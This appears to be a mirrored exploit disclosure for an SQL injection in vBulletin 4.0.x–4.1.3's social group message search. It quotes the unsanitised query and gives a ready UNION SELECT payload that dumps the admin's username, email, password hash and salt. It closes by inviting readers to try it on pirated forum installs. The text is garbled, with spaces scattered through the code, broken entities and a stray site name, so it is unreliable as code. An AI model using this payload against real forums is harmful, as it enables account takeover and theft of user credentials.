Vbulletin 4.0.x = & gt; 4.1.3 (messagegroupid) SQL Injection defect 0-da

 

Vulnerability:

Vbulletin 4. x. x => 4.1.3 suffers from an SQL injection Vulnerability in parameter "& messagegroupid" due to improper input validation.

 

Vulnerable Code:

 

File:/vbforum/search/type/socialgroupmessage. php

 

Line No: 388 www.2cto.com

 

Paramater: messagegroupid

 

If ($ registry-> GPC_exists ['messagegroupid '] AND count ($ registry-> GPC ['messagegroupid'])> 0)

 

{

$ Value = $ registry-> GPC ['messagegroupid '];

 

If (! Is_array ($ value ))

{

$ Value = array ($ value );

}

If (! (In_array ('', $ value) OR in_array ('', $ value )))

{

 

If ($ rst = $ vbulletin-> db-> query_read ("

 

SELECT socialgroup. name

 

FROM ". TABLE_PREFIX." socialgroup AS socialgroup

---> WHERE socialgroup. groupid IN (". implode (',', $ value ).")")

 

}

Exploitation:

 

Post data on: --> search. php? Search_type = 1

 

--> Search Single Content Type

 

Keywords: Valid Group Message

Search Type: Group Messages

Search in Group: Valid Group Id

& Messagegroupid [0] = 3) union select concat (username, 0x3a, email, 0x3a, password, 0x3a, salt) FROM user WHERE userid = 1 #

 

More Details:

Http: // www.Garage4Hackers.com

Http://www.garage4hackers.com/showthread.php? 1177-Vbulletin-4.0.x-gt-4.1.3-(messagegroupid)-SQL-injection-Vulnerability-0-day

Note:

Funny part was that, a similar bug was found in the same module, search query two months back. Any way Vbulletin has released a patch as it was reported to them by altex, hence

 

Customers are safe Because t those lowsy Admins. And this bug is for people to play with the specified Nulled VB sites out there. "Say No to Piracy Disclosure ".